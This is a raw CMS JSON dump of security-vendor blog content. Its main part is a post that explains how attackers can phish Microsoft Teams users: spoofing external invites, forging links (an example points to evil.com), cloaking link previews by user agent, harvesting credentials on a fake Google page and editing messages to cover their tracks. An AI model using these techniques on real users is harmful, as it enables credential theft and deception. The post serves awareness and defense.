inventory",{"data":41138,"content":41139,"nodeType":879},{},[41140],{"data":41141,"marks":41142,"value":41143,"nodeType":883},{},[],"Finding and fixing ghost logins is a challenge for most organizations. Since you can’t rely on the view provided by your IdP, you need to:",{"data":41145,"content":41146,"nodeType":1531},{},[41147,41157,41167],{"data":41148,"content":41149,"nodeType":1535},{},[41150],{"data":41151,"content":41152,"nodeType":879},{},[41153],{"data":41154,"marks":41155,"value":41156,"nodeType":883},{},[],"Discover the apps in use across your organization",{"data":41158,"content":41159,"nodeType":1535},{},[41160],{"data":41161,"content":41162,"nodeType":879},{},[41163],{"data":41164,"marks":41165,"value":41166,"nodeType":883},{},[],"Get admin rights, audit each app, and unset any local credentials (enforcing MFA at the app-level too if you can, for good measure)",{"data":41168,"content":41169,"nodeType":1535},{},[41170],{"data":41171,"content":41172,"nodeType":879},{},[41173],{"data":41174,"marks":41175,"value":41176,"nodeType":883},{},[],"Configure the app to prevent local accounts being created (again, if possible)",{"data":41178,"content":41179,"nodeType":879},{},[41180],{"data":41181,"marks":41182,"value":41183,"nodeType":883},{},[],"Not only is this a sisyphean task with continually moving goalposts, but depending on which apps you use, and how they’ve been designed, it may not be possible to remediate every instance of ghost logins. For that reason, it’s important to also invest in your identity threat detection and response capabilities — for when, not if, an account takeover attempt occurs. ",{"data":41185,"content":41186,"nodeType":879},{},[41187,41191,41199],{"data":41188,"marks":41189,"value":41190,"nodeType":883},{},[],"Push helps organizations to defend against ghost logins and other identity threats with a defense-in-depth approach: Using a browser-based agent to generate visibility of all logins (not just via IdP logs) while also detecting, intercepting, and shutting down account takeover attempts via phishing, credential stuffing, and session hijacking. ",{"data":41192,"content":41193,"nodeType":940},{"uri":37433},[41194],{"data":41195,"marks":41196,"value":41198,"nodeType":883},{},[41197],{"type":948},"Learn more here.",{"data":41200,"marks":41201,"value":21,"nodeType":883},{},[],{"data":41203,"content":41204,"nodeType":879},{},[41205,41209,41217],{"data":41206,"marks":41207,"value":41208,"nodeType":883},{},[],"And if you'd like to learn more about ghost logins and other identity attack techniques, ",{"data":41210,"content":41212,"nodeType":940},{"uri":41211},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks?tab=readme-ov-file",[41213],{"data":41214,"marks":41215,"value":41216,"nodeType":883},{},[],"check out the SaaS attack matrix on GitHub",{"data":41218,"marks":41219,"value":6141,"nodeType":883},{},[],{"data":41221,"content":41225,"nodeType":971},{"target":41222},{"sys":41223},{"id":41224,"type":976,"linkType":977},"1VMpMgZvx9hgps2OoxCTmF",[],{"data":41227,"content":41228,"nodeType":879},{},[41229],{"data":41230,"marks":41231,"value":21,"nodeType":883},{},[],"Ghost logins: When forgotten identities come back to haunt you","How ghost logins can be used by cyber attackers for account takeover and persistence.","2024-07-10T00:00:00.000Z","ghost-logins-when-forgotten-identities-come-back-to-haunt-you",{"items":41237},[41238,41240],{"sys":41239,"name":3273},{"id":3272},{"sys":41241,"name":343},{"id":3276},{"items":41243},[41244],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":41245},{"url":872},"what-the-rise-of-infostealers-says-about-identity-attacks","blog\u002Fwhat-the-rise-of-infostealers-says-about-identity-attacks",{"json":41249},{"data":41250,"content":41251,"nodeType":875},{},[41252],{"data":41253,"content":41254,"nodeType":879},{},[41255],{"data":41256,"marks":41257,"value":41258,"nodeType":883},{},[],"Infostealers seem to have become an overnight celebrity, having been previously shrugged off by enterprises with bigger fish to fry. The reality is that infostealers haven’t necessarily changed – but the world that they inhabit and how stolen data is used has.  ","What the rise in popularity of infostealers tells us about the cybercrime ecosystem and the shift toward identity attacks. ",{"id":41261,"publishedAt":41262},"4OrixXXLxRmSDxa7PF9gfM","2026-08-12T11:55:07.366Z",{"items":41264},[41265,41267],{"sys":41266,"name":3273},{"id":3272},{"sys":41268,"name":343},{"id":3276},{"items":41270},[41271,41273,41275,41277,41279,41281,41283,41285,41287,41289,41291,41293,41295,41297,41299,41301,41303,41305,41307],{"sys":41272,"name":280,"slug":281,"tier":31},{"id":277},{"sys":41274,"name":415,"slug":416,"tier":31},{"id":412},{"sys":41276,"name":641,"slug":642,"tier":31},{"id":638},{"sys":41278,"name":343,"slug":344,"tier":31},{"id":340},{"sys":41280,"name":521,"slug":522,"tier":31},{"id":518},{"sys":41282,"name":424,"slug":425,"tier":45},{"id":421},{"sys":41284,"name":334,"slug":335,"tier":45},{"id":331},{"sys":41286,"name":406,"slug":407,"tier":45},{"id":403},{"sys":41288,"name":573,"slug":574,"tier":45},{"id":570},{"sys":41290,"name":397,"slug":398,"tier":45},{"id":394},{"sys":41292,"name":450,"slug":451,"tier":45},{"id":447},{"sys":41294,"name":379,"slug":380,"tier":45},{"id":376},{"sys":41296,"name":530,"slug":531,"tier":45},{"id":527},{"sys":41298,"name":442,"slug":443,"tier":45},{"id":439},{"sys":41300,"name":503,"slug":504,"tier":45},{"id":500},{"sys":41302,"name":459,"slug":460,"tier":45},{"id":456},{"sys":41304,"name":539,"slug":540,"tier":45},{"id":536},{"sys":41306,"name":632,"slug":633,"tier":45},{"id":629},{"sys":41308,"name":607,"slug":608,"tier":45},{"id":604},"boUmh78SvCFSf6ZZgGkEQDAnKYwTjYN1VqCF_IIHTHc",{"id":41311,"title":41312,"authorsCollection":41313,"content":41319,"extension":228,"faqItemsCollection":42131,"faqTitle":59,"featured":6,"hashTags":59,"meta":42133,"metaTitle":42134,"ogImage":59,"postType":8981,"publishedDate":42135,"relatedBlogPostsCollection":42136,"slug":42138,"stem":42139,"subtitle":59,"summary":42140,"synopsis":42151,"sys":42152,"tagsCollection":42155,"topicsCollection":42161,"__hash__":42181},"blog\u002Fblog\u002Fphishing-microsoft-teams-for-initial-access.json","Phishing Microsoft Teams for initial access",{"items":41314},[41315],{"fullName":3930,"firstName":3931,"jobTitle":3932,"socialLinks":41316,"profilePicture":41318},[41317],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fluke-jennings-042b5619b\u002F",{"url":3934},{"json":41320,"links":42030},{"data":41321,"content":41322,"nodeType":875},{},[41323,41330,41379,41386,41393,41436,41443,41451,41458,41465,41472,41479,41512,41519,41564,41570,41577,41584,41591,41598,41605,41612,41619,41626,41632,41638,41645,41652,41658,41665,41672,41679,41686,41693,41718,41725,41732,41739,41746,41752,41759,41765,41772,41779,41785,41792,41800,41807,41814,41820,41827,41833,41840,41847,41854,41861,41868,41874,41880,41887,41894,41900,41907,41914,41921,41928,41934,41941,41948,41991,41997,42004,42011,42018,42024],{"data":41324,"content":41325,"nodeType":879},{},[41326],{"data":41327,"marks":41328,"value":41329,"nodeType":883},{},[],"We previously wrote two articles about phishing via Slack, the first for the initial access kill chain phase and the second for lateral movement and persistence. For those interested, the links are below:",{"data":41331,"content":41332,"nodeType":1531},{},[41333,41356],{"data":41334,"content":41335,"nodeType":1535},{},[41336],{"data":41337,"content":41338,"nodeType":879},{},[41339,41342,41353],{"data":41340,"marks":41341,"value":21,"nodeType":883},{},[],{"data":41343,"content":41347,"nodeType":18112},{"target":41344},{"sys":41345},{"id":41346,"type":976,"linkType":977},"2rjLrCo6KWwLicfpV2qTOZ",[41348],{"data":41349,"marks":41350,"value":41352,"nodeType":883},{},[41351],{"type":948},"Phishing through Slack for initial access",{"data":41354,"marks":41355,"value":21,"nodeType":883},{},[],{"data":41357,"content":41358,"nodeType":1535},{},[41359],{"data":41360,"content":41361,"nodeType":879},{},[41362,41365,41376],{"data":41363,"marks":41364,"value":21,"nodeType":883},{},[],{"data":41366,"content":41370,"nodeType":18112},{"target":41367},{"sys":41368},{"id":41369,"type":976,"linkType":977},"1hU7XNIizp4vQXsiiQmqvI",[41371],{"data":41372,"marks":41373,"value":41375,"nodeType":883},{},[41374],{"type":948},"Phishing Slack for lateral movement and persistence",{"data":41377,"marks":41378,"value":21,"nodeType":883},{},[],{"data":41380,"content":41381,"nodeType":879},{},[41382],{"data":41383,"marks":41384,"value":41385,"nodeType":883},{},[],"Some readers asked what this looks like for Microsoft Teams and so we decided to write this article to show what similar attacks look like via Teams.",{"data":41387,"content":41388,"nodeType":879},{},[41389],{"data":41390,"marks":41391,"value":41392,"nodeType":883},{},[],"We’ll primarily be using the following SaaS attack techniques chained together:",{"data":41394,"content":41395,"nodeType":1531},{},[41396,41416],{"data":41397,"content":41398,"nodeType":1535},{},[41399],{"data":41400,"content":41401,"nodeType":879},{},[41402,41405,41413],{"data":41403,"marks":41404,"value":21,"nodeType":883},{},[],{"data":41406,"content":41408,"nodeType":940},{"uri":41407},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fim_phishing\u002Fdescription.md",[41409],{"data":41410,"marks":41411,"value":41412,"nodeType":883},{},[],"SAT1018 - IM phishing",{"data":41414,"marks":41415,"value":21,"nodeType":883},{},[],{"data":41417,"content":41418,"nodeType":1535},{},[41419],{"data":41420,"content":41421,"nodeType":879},{},[41422,41425,41433],{"data":41423,"marks":41424,"value":21,"nodeType":883},{},[],{"data":41426,"content":41428,"nodeType":940},{"uri":41427},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fim_user_spoofing\u002Fdescription.md",[41429],{"data":41430,"marks":41431,"value":41432,"nodeType":883},{},[],"SAT1019 - IM user spoofing",{"data":41434,"marks":41435,"value":21,"nodeType":883},{},[],{"data":41437,"content":41438,"nodeType":909},{},[41439],{"data":41440,"marks":41441,"value":41442,"nodeType":883},{},[],"Why focus on instant messengers?",{"data":41444,"content":41445,"nodeType":879},{},[41446],{"data":41447,"marks":41448,"value":41450,"nodeType":883},{},[41449],{"type":891},"If you’ve read either of the previous articles on Slack, you can skip this introductory piece and jump straight to the next section.",{"data":41452,"content":41453,"nodeType":879},{},[41454],{"data":41455,"marks":41456,"value":41457,"nodeType":883},{},[],"They aren’t new, however, the original focus of IM apps was on internal communication and phishing and social engineering attacks are often external. Email remained the standards-based protocol that enabled external communication no matter what email vendor was in use. In recent years, however, instant messengers (IM) have become the primary method of communication for many businesses. I wanted to focus on IM here because if that’s where employees are communicating, it’s the best place to launch attacks against them. Even better, there’s a history of users placing a higher degree of trust in IM platforms than email, so it becomes a potentially easy target.",{"data":41459,"content":41460,"nodeType":879},{},[41461],{"data":41462,"marks":41463,"value":41464,"nodeType":883},{},[],"While IM platforms were initially used solely for internal communications, organizations quickly realized that IM platforms could be used to communicate with external groups, individuals, freelancers, and contractors, with the hope of fewer emails and more instant communications. ",{"data":41466,"content":41467,"nodeType":879},{},[41468],{"data":41469,"marks":41470,"value":41471,"nodeType":883},{},[],"We now have Slack Connect and Microsoft Teams external access to support this, with Slack Connect introduced in June 2020 and Teams introducing it in January 2022. This external access has increased the attack surface of these platforms considerably.",{"data":41473,"content":41474,"nodeType":879},{},[41475],{"data":41476,"marks":41477,"value":41478,"nodeType":883},{},[],"Despite decades of security research, email security appliances and user security training, email-based phishing and social engineering is still commonly successful. Now we have instant messenger platforms with:",{"data":41480,"content":41481,"nodeType":1531},{},[41482,41492,41502],{"data":41483,"content":41484,"nodeType":1535},{},[41485],{"data":41486,"content":41487,"nodeType":879},{},[41488],{"data":41489,"marks":41490,"value":41491,"nodeType":883},{},[],"Richer functionality than email, ",{"data":41493,"content":41494,"nodeType":1535},{},[41495],{"data":41496,"content":41497,"nodeType":879},{},[41498],{"data":41499,"marks":41500,"value":41501,"nodeType":883},{},[],"Lacking centralized security gateways and other security controls common to email and ",{"data":41503,"content":41504,"nodeType":1535},{},[41505],{"data":41506,"content":41507,"nodeType":879},{},[41508],{"data":41509,"marks":41510,"value":41511,"nodeType":883},{},[],"Unfamiliar as a threat vector to your average user compared with email. ",{"data":41513,"content":41514,"nodeType":879},{},[41515],{"data":41516,"marks":41517,"value":41518,"nodeType":883},{},[],"There’s also a sense of urgency associated with IM messages due to the conversational nature compared with emails. Combined with a history of increased trust, we have the ingredients for increased social engineering success.",{"data":41520,"content":41521,"nodeType":879},{},[41522,41526,41535,41539,41548,41552,41561],{"data":41523,"marks":41524,"value":41525,"nodeType":883},{},[],"There’s been an uptick recently in IM-based phishing research and real-world attacks, particularly for Microsoft Teams. For example, check out the ",{"data":41527,"content":41529,"nodeType":940},{"uri":41528},"https:\u002F\u002Flabs.jumpsec.com\u002Fadvisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware\u002F",[41530],{"data":41531,"marks":41532,"value":41534,"nodeType":883},{},[41533],{"type":948},"great research from JumpSec",{"data":41536,"marks":41537,"value":41538,"nodeType":883},{},[]," on bypassing attachment protection for external Teams messages, the offensive tool ",{"data":41540,"content":41542,"nodeType":940},{"uri":41541},"https:\u002F\u002Fgithub.com\u002FOctoberfest7\u002FTeamsPhisher",[41543],{"data":41544,"marks":41545,"value":41547,"nodeType":883},{},[41546],{"type":948},"TeamsPhisher",{"data":41549,"marks":41550,"value":41551,"nodeType":883},{},[]," and attacks distributing ",{"data":41553,"content":41555,"nodeType":940},{"uri":41554},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmicrosoft-teams-phishing-attack-pushes-darkgate-malware\u002F",[41556],{"data":41557,"marks":41558,"value":41560,"nodeType":883},{},[41559],{"type":948},"DarkGate malware via Teams",{"data":41562,"marks":41563,"value":1350,"nodeType":883},{},[],{"data":41565,"content":41569,"nodeType":971},{"target":41566},{"sys":41567},{"id":41568,"type":976,"linkType":977},"6iKFd9Qys2SSuNqKVQB7ka",[],{"data":41571,"content":41572,"nodeType":909},{},[41573],{"data":41574,"marks":41575,"value":41576,"nodeType":883},{},[],"IM user spoofing",{"data":41578,"content":41579,"nodeType":879},{},[41580],{"data":41581,"marks":41582,"value":41583,"nodeType":883},{},[],"The first consideration is the spoofing aspect. We’ve all seen techniques for spoofing emails, but there are many security controls like Sender Policy Framework (SPF) that can prevent direct spoofing of domains and email security gateways that can flag suspicious domains.",{"data":41585,"content":41586,"nodeType":879},{},[41587],{"data":41588,"marks":41589,"value":41590,"nodeType":883},{},[],"Those security controls don’t exist for IM, so we have new options for spoofing.",{"data":41592,"content":41593,"nodeType":1036},{},[41594],{"data":41595,"marks":41596,"value":41597,"nodeType":883},{},[],"External IM invites",{"data":41599,"content":41600,"nodeType":879},{},[41601],{"data":41602,"marks":41603,"value":41604,"nodeType":883},{},[],"IM applications often make use of friendly display names for organization and employee names as well as user-chosen handles. These often don’t need to be unique either. One interesting aspect with Microsoft Teams is the behavior of this differs depending on if the external message request is received from a Teams organization or an individual Microsoft account user using Teams. ",{"data":41606,"content":41607,"nodeType":1036},{},[41608],{"data":41609,"marks":41610,"value":41611,"nodeType":883},{},[],"External invite from individual Microsoft account",{"data":41613,"content":41614,"nodeType":879},{},[41615],{"data":41616,"marks":41617,"value":41618,"nodeType":883},{},[],"When messaging from an individual Microsoft account, we can choose the name to represent ourselves but we can’t choose an organization name. ",{"data":41620,"content":41621,"nodeType":879},{},[41622],{"data":41623,"marks":41624,"value":41625,"nodeType":883},{},[],"This is somewhat neutral in this case as we can’t spoof a legitimate organization name but the invite doesn’t show the real email address of the attacker’s account in this case and simply displays “External” as an indicator. Additionally, when messages are received from the external user the profile photo shown by the user does not show so we can’t spoof a known profile photo either.",{"data":41627,"content":41631,"nodeType":971},{"target":41628},{"sys":41629},{"id":41630,"type":976,"linkType":977},"zILCczBEC70U7rZCdQKTL",[],{"data":41633,"content":41637,"nodeType":971},{"target":41634},{"sys":41635},{"id":41636,"type":976,"linkType":977},"2JK0JDCZyPMF4btzGnFFHs",[],{"data":41639,"content":41640,"nodeType":1036},{},[41641],{"data":41642,"marks":41643,"value":41644,"nodeType":883},{},[],"External invite from Teams organization",{"data":41646,"content":41647,"nodeType":879},{},[41648],{"data":41649,"marks":41650,"value":41651,"nodeType":883},{},[],"On the other hand, if we initiate an external connection request from a Teams organization then we can control our organization name but this is not of use to us in this case. This is because the connection request actually shows the email address of the user account. Therefore, we need to register a convincing email domain and we are relegated back to something much closer to standard email social engineering techniques.",{"data":41653,"content":41657,"nodeType":971},{"target":41654},{"sys":41655},{"id":41656,"type":976,"linkType":977},"7anwp3Aogq28Gfl31m57Sp",[],{"data":41659,"content":41660,"nodeType":879},{},[41661],{"data":41662,"marks":41663,"value":41664,"nodeType":883},{},[],"In this case, it seems better to use an individual Microsoft account with teams to spoof external invites as it’s not easy for a target user to tell if the user or organization requesting to connect is legitimate when they first receive this invitation. ",{"data":41666,"content":41667,"nodeType":879},{},[41668],{"data":41669,"marks":41670,"value":41671,"nodeType":883},{},[],"Whatever method is used, there’s also a curiosity incentive - you can’t see a first message from the user, so it’s tempting for the target user to accept in order to see the message, even if they then ignore it. This is one case where Teams actually provides an interesting defensive ability - it’s possible for the user to preview the message that has been sent without formally accepting the invitation first.",{"data":41673,"content":41674,"nodeType":879},{},[41675],{"data":41676,"marks":41677,"value":41678,"nodeType":883},{},[],"Whilst the initial invite spoofing options with Teams are not ideal from an attacker’s perspective (Slack certainly provides more interesting spoofing capabilities) there are certainly options to experiment with and it still allows for some capabilities not possible with email spoofing, such as hiding the email address and showing a display name only.",{"data":41680,"content":41681,"nodeType":879},{},[41682],{"data":41683,"marks":41684,"value":41685,"nodeType":883},{},[],"However, all an attacker needs to do is get a first connection and they have cleared the first hurdle. They can now launch attacks either immediately or in future. The conversational nature of IM apps makes it much easier to ramp up the conversation gradually towards an actual attack using a malicious link or attachment that is more likely to succeed.",{"data":41687,"content":41688,"nodeType":909},{},[41689],{"data":41690,"marks":41691,"value":41692,"nodeType":883},{},[],"Link preview spoofing",{"data":41694,"content":41695,"nodeType":879},{},[41696,41700,41705,41709,41714],{"data":41697,"marks":41698,"value":41699,"nodeType":883},{},[],"Another key issue is link preview spoofing. HTML allows a variety of ways to specify hyperlinks. In email, secure email gateways will often alert or block commonly abused types, such as forging a different URL as the link display text to what the underlying link points to. For example, an attacker could show the link as ",{"data":41701,"marks":41702,"value":41704,"nodeType":883},{},[41703],{"type":948},"https:\u002F\u002Fwww.google.com",{"data":41706,"marks":41707,"value":41708,"nodeType":883},{},[]," but direct it to ",{"data":41710,"marks":41711,"value":41713,"nodeType":883},{},[41712],{"type":948},"https:\u002F\u002Fwww.evil.com",{"data":41715,"marks":41716,"value":41717,"nodeType":883},{},[]," when it is clicked. Secure email gateways often perform a lot of other analysis of links, including domain analysis and active crawling to identify common phishing attacks.",{"data":41719,"content":41720,"nodeType":879},{},[41721],{"data":41722,"marks":41723,"value":41724,"nodeType":883},{},[],"On IM applications, however, this same standard of link analysis is not always present and the widespread introduction of link unfurling\u002Fpreviewing has also given additional options for spoofing links to hide their true source and increase social engineering success. ",{"data":41726,"content":41727,"nodeType":1036},{},[41728],{"data":41729,"marks":41730,"value":41731,"nodeType":883},{},[],"Traditional link forging",{"data":41733,"content":41734,"nodeType":879},{},[41735],{"data":41736,"marks":41737,"value":41738,"nodeType":883},{},[],"We’ll start with a common traditional link forging scenario to see how Teams handles that, then show how link previews change the threat.",{"data":41740,"content":41741,"nodeType":879},{},[41742],{"data":41743,"marks":41744,"value":41745,"nodeType":883},{},[],"Here, we can see forging a link is permitted by Teams. A hover-over for a few seconds will show the real URL, but there is nothing stopping an attacker forging fake links if the user just clicks them without checking. This is something commonly prevented by secure email gateways and is something that generates an explicit warning when performed using Slack.",{"data":41747,"content":41751,"nodeType":971},{"target":41748},{"sys":41749},{"id":41750,"type":976,"linkType":977},"6WhYD92zZfMp9BqVdDD7oo",[],{"data":41753,"content":41754,"nodeType":879},{},[41755],{"data":41756,"marks":41757,"value":41758,"nodeType":883},{},[],"We can of course use friendly text to construct a link to our malicious domain too, something often used in email-based phishing. However, it still shows the real URL on hover-over and so it’s arguably of less use in teams when we can straight up forge fake links. A user is much less likely to check the hover-over if they think they’ve already seen the real URL as in the case of the forged link shown previously.",{"data":41760,"content":41764,"nodeType":971},{"target":41761},{"sys":41762},{"id":41763,"type":976,"linkType":977},"18Ziitk77uqffkzcPMAU48",[],{"data":41766,"content":41767,"nodeType":1036},{},[41768],{"data":41769,"marks":41770,"value":41771,"nodeType":883},{},[],"Abusing link previews",{"data":41773,"content":41774,"nodeType":879},{},[41775],{"data":41776,"marks":41777,"value":41778,"nodeType":883},{},[],"It gets more interesting when we use links that Teams is able to unfurl to provide a link preview. Here we’ll show a legitimate example of posting one of our own blogs where Teams helpfully unfurls the URL and gives some context to the link as a preview:",{"data":41780,"content":41784,"nodeType":971},{"target":41781},{"sys":41782},{"id":41783,"type":976,"linkType":977},"2Zur3eM6QgogohMAO9bpZ7",[],{"data":41786,"content":41787,"nodeType":879},{},[41788],{"data":41789,"marks":41790,"value":41791,"nodeType":883},{},[],"This is very useful for the user and, despite the fact you can still see the domain as part of the preview, the rest of the preview dominates the display and gives a sense of legitimacy. The user can also hover-over the link to see the full URL, but they have much less reason to do that when seeing the link preview and if they notice the domain that’s displayed too.",{"data":41793,"content":41794,"nodeType":879},{},[41795],{"data":41796,"marks":41797,"value":41799,"nodeType":883},{},[41798],{"type":916},"So, how can we use this scenario maliciously?",{"data":41801,"content":41802,"nodeType":879},{},[41803],{"data":41804,"marks":41805,"value":41806,"nodeType":883},{},[],"The obvious attack scenario is to forge a different link preview for Teams than what is given to the user when they click the link. Then when the user clicks the link, they’ll be directed to our phishing page instead. ",{"data":41808,"content":41809,"nodeType":879},{},[41810],{"data":41811,"marks":41812,"value":41813,"nodeType":883},{},[],"We can do this by performing user agent specific processing of web requests. For example, Teams unfurling uses a user agent like the following:",{"data":41815,"content":41819,"nodeType":971},{"target":41816},{"sys":41817},{"id":41818,"type":976,"linkType":977},"703zjwvTs3DGZwkerIx9G8",[],{"data":41821,"content":41822,"nodeType":879},{},[41823],{"data":41824,"marks":41825,"value":41826,"nodeType":883},{},[],"Therefore, without even requiring much sophistication, we can use some simple python code to perform a redirect to a legitimate source when our web request handler sees this user agent. However, when a target user visits using a normal web browser we instead return a malicious page. The example python code below redirects to benign content for a Teams preview, while serving malicious content otherwise:",{"data":41828,"content":41832,"nodeType":971},{"target":41829},{"sys":41830},{"id":41831,"type":976,"linkType":977},"5W64wjVFHtjscIMWNQvFAT",[],{"data":41834,"content":41835,"nodeType":879},{},[41836],{"data":41837,"marks":41838,"value":41839,"nodeType":883},{},[],"If you’ve read our previous Slack article, you’ll recall that we also minimized the link text to a period so as to reduce the chances of the user performing a hover-over to see the real URL, whereas the link preview itself is much larger and clickable. ",{"data":41841,"content":41842,"nodeType":879},{},[41843],{"data":41844,"marks":41845,"value":41846,"nodeType":883},{},[],"The problem with Teams is that the domain portion of the link shows as part of the link preview as we saw above, which isn’t ideal as an attacker. Obviously, in a real attack we would register as convincing a domain as we could but we’d still rather the user either does not see it or sees a genuinely legitimate domain instead.",{"data":41848,"content":41849,"nodeType":879},{},[41850],{"data":41851,"marks":41852,"value":41853,"nodeType":883},{},[],"However, we also saw before that, unlike Slack, Teams allows full link forging without a warning. Hyperlinks are blue highlighted and much more prominent and so our attack strategy is best focused on presenting a forged legitimate URL that draws the user’s attention, along with a forged link preview and distracting them from the faded real domain that shows below.",{"data":41855,"content":41856,"nodeType":879},{},[41857],{"data":41858,"marks":41859,"value":41860,"nodeType":883},{},[],"The end result of this is that the user sees both a legitimate URL and a nice friendly link preview legitimately produced by Teams and Google Docs in real time, whereas if they click the link they’ll be taken to our phishing page instead. ",{"data":41862,"content":41863,"nodeType":879},{},[41864],{"data":41865,"marks":41866,"value":41867,"nodeType":883},{},[],"In this case, we have shown a Google style phishing page as an example for harvesting credentials. Hopefully, the user will assume their Google Docs session expired and then re-enter their credentials. See what the target user would see below:",{"data":41869,"content":41873,"nodeType":971},{"target":41870},{"sys":41871},{"id":41872,"type":976,"linkType":977},"46ZtHG4bp9bCdiCmmvciee",[],{"data":41875,"content":41879,"nodeType":971},{"target":41876},{"sys":41877},{"id":41878,"type":976,"linkType":977},"12F0HcFMo5Yd3rSaDX3W7q",[],{"data":41881,"content":41882,"nodeType":879},{},[41883],{"data":41884,"marks":41885,"value":41886,"nodeType":883},{},[],"As we can see, the phishing message generated in this case is pretty convincing. It shows a legitimate link to Google docs that is highlighted and a legitimate link preview too. The faded ngrok domain in the link preview is very easy to miss. However, clicking the link will take the user to our phishing page.",{"data":41888,"content":41889,"nodeType":879},{},[41890],{"data":41891,"marks":41892,"value":41893,"nodeType":883},{},[],"The diagram below shows how this attack works from a data flow perspective:",{"data":41895,"content":41899,"nodeType":971},{"target":41896},{"sys":41897},{"id":41898,"type":976,"linkType":977},"1Tv7cohtgUhXpYWiZdmw8J",[],{"data":41901,"content":41902,"nodeType":909},{},[41903],{"data":41904,"marks":41905,"value":41906,"nodeType":883},{},[],"Cleaning you tracks",{"data":41908,"content":41909,"nodeType":879},{},[41910],{"data":41911,"marks":41912,"value":41913,"nodeType":883},{},[],"Ok, so let’s say an attacker has either successfully phished the target user or perhaps now the user is suspicious and likely contacting security or IT. One of the great benefits of IM apps is you can generally edit and delete messages, which can be abused by an attacker.",{"data":41915,"content":41916,"nodeType":879},{},[41917],{"data":41918,"marks":41919,"value":41920,"nodeType":883},{},[],"As an attacker, I could make a tiny change to my message to replace the malicious link with the legitimate link I was spoofing for the link preview if I got the sense the target was getting suspicious. Then, if an incident responder comes to investigate, the malicious link is now gone and the message itself appears almost identical, covering my tracks. Other than being able to see the message has been edited, it’s no longer easy to see this was a phishing attack or where the phishing link pointed to. ",{"data":41922,"content":41923,"nodeType":879},{},[41924],{"data":41925,"marks":41926,"value":41927,"nodeType":883},{},[],"This is definitely a useful capability that isn’t usually possible with email phishing! See this minor change reflected below, making the original phishing message appear innocuous due to the replacement of the phishing URL with a legitimate URL. A careful observer will notice that the message appears almost identical to the original, only now the faded domain in the link preview shows docs.google.com, instead of our malicious domain, since the link has been edited.",{"data":41929,"content":41933,"nodeType":971},{"target":41930},{"sys":41931},{"id":41932,"type":976,"linkType":977},"7prJ4j2AdLrcKXOJQU5mPp",[],{"data":41935,"content":41936,"nodeType":909},{},[41937],{"data":41938,"marks":41939,"value":41940,"nodeType":883},{},[],"Impact",{"data":41942,"content":41943,"nodeType":879},{},[41944],{"data":41945,"marks":41946,"value":41947,"nodeType":883},{},[],"We’ve covered a lot of ground here, showing the chaining of external user spoofing attacks with link preview spoofing and also how to cover your tracks afterwards. It’s worth taking a step back and considering the key impact points:",{"data":41949,"content":41950,"nodeType":1531},{},[41951,41961,41971,41981],{"data":41952,"content":41953,"nodeType":1535},{},[41954],{"data":41955,"content":41956,"nodeType":879},{},[41957],{"data":41958,"marks":41959,"value":41960,"nodeType":883},{},[],"IM apps like Teams are now external phishing and social engineering vectors, not just internal ones",{"data":41962,"content":41963,"nodeType":1535},{},[41964],{"data":41965,"content":41966,"nodeType":879},{},[41967],{"data":41968,"marks":41969,"value":41970,"nodeType":883},{},[],"User spoofing can be used in novel ways to enhance social engineering that employees may not be familiar with",{"data":41972,"content":41973,"nodeType":1535},{},[41974],{"data":41975,"content":41976,"nodeType":879},{},[41977],{"data":41978,"marks":41979,"value":41980,"nodeType":883},{},[],"Link spoofing techniques can make phishing links much harder to spot and so increase social engineering success",{"data":41982,"content":41983,"nodeType":1535},{},[41984],{"data":41985,"content":41986,"nodeType":879},{},[41987],{"data":41988,"marks":41989,"value":41990,"nodeType":883},{},[],"Malicious Teams messages can be modified later to replace the phishing link to cover up the attack",{"data":41992,"content":41993,"nodeType":909},{},[41994],{"data":41995,"marks":41996,"value":1702,"nodeType":883},{},[],{"data":41998,"content":41999,"nodeType":879},{},[42000],{"data":42001,"marks":42002,"value":42003,"nodeType":883},{},[],"IM apps have become the default internal communication for most organizations now, but are now a common method of communication with external parties, as well. This means they’ll become a key battleground in both the initial access phase of compromises and the latter phases of lateral movement and persistence. ",{"data":42005,"content":42006,"nodeType":879},{},[42007],{"data":42008,"marks":42009,"value":42010,"nodeType":883},{},[],"This also means organizations reliant on traditional email security gateways and email-based phishing training are likely to see the effectiveness of these controls decrease if attacks shift to the IM apps.",{"data":42012,"content":42013,"nodeType":879},{},[42014],{"data":42015,"marks":42016,"value":42017,"nodeType":883},{},[],"In this article, we highlighted a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.",{"data":42019,"content":42023,"nodeType":971},{"target":42020},{"sys":42021},{"id":42022,"type":976,"linkType":977},"2y0INxqAi594O7rCAVKhTI",[],{"data":42025,"content":42026,"nodeType":879},{},[42027],{"data":42028,"marks":42029,"value":21,"nodeType":883},{},[],{"entries":42031},{"inline":42032,"hyperlink":42033,"block":42042},[],[42034,42038],{"sys":42035,"__typename":1967,"title":42036,"slug":42037},{"id":41346},"Slack Attack: A phisher's guide to initial access","slack-phishing-for-initial-access",{"sys":42039,"__typename":1967,"title":42040,"slug":42041},{"id":41369},"Slack Attack: A phisher's guide to persistence and lateral movement","phishing-slack-persistence",[42043,42048,42056,42063,42070,42076,42081,42088,42094,42099,42106,42113,42120,42125],{"sys":42044,"__typename":13297,"type":42045,"ctaText":42046,"buttonLabel":42047,"buttonColour":13301,"buttonUrl":59},{"id":41568},"Demo","Learn how Push can help you secure identities across your org","Book a demo!",{"sys":42049,"__typename":1765,"title":42050,"caption":42051,"layoutMode":59,"file":42052},{"id":41630},"Teams invite from an external user","Teams invite from an external user with an attacker chosen username",{"url":42053,"width":42054,"height":42055},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F41BM40X0zR7GLT9augEWse\u002F20c8c47ae602252dc5ad04f03dbd5791\u002FTeams_invite_from_an_external_user.png",677,611,{"sys":42057,"__typename":1765,"title":42058,"caption":42058,"layoutMode":59,"file":42059},{"id":41636},"Rendering of the attacker chosen name from an external 